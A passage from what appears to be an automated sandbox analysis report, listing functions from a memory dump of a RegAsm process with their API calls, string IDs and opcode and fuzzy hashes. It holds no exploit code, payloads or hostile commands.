                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintf
                                          • String ID: %%-%d.%ds
                                          • API String ID: 3988819677-2008345750
                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040E770
                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: F^@
                                          • API String ID: 568519121-3652327722
                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PlacementWindowmemset
                                          • String ID: WinPos
                                          • API String ID: 4036792311-2823255486
                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@DeleteObject
                                          • String ID: r!A
                                          • API String ID: 1103273653-628097481
                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                          • memset.MSVCRT ref: 0042BAAE
                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                          • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                          Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                          • free.MSVCRT ref: 0040A908
                                          • free.MSVCRT ref: 0040A92B
                                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$memcpy$mallocwcslen
                                          • String ID:
                                          • API String ID: 726966127-0
                                          • Opcode ID: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                          • Opcode Fuzzy Hash: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                          Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcslen.MSVCRT ref: 0040B1DE
                                          • free.MSVCRT ref: 0040B201
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                          • free.MSVCRT ref: 0040B224
                                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$memcpy$mallocwcslen
                                          • String ID:
                                          • API String ID: 726966127-0
                                          • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                          • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                          Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strlen.MSVCRT ref: 0040B0D8
                                          • free.MSVCRT ref: 0040B0FB
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                          • free.MSVCRT ref: 0040B12C
                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 3669619086-0
                                          • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                          • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                          • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                          Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                          • malloc.MSVCRT ref: 00417407
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                          • free.MSVCRT ref: 00417425
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$freemalloc
                                          • String ID:
                                          • API String ID: 2605342592-0
                                          • Opcode ID: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                          • Opcode Fuzzy Hash: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5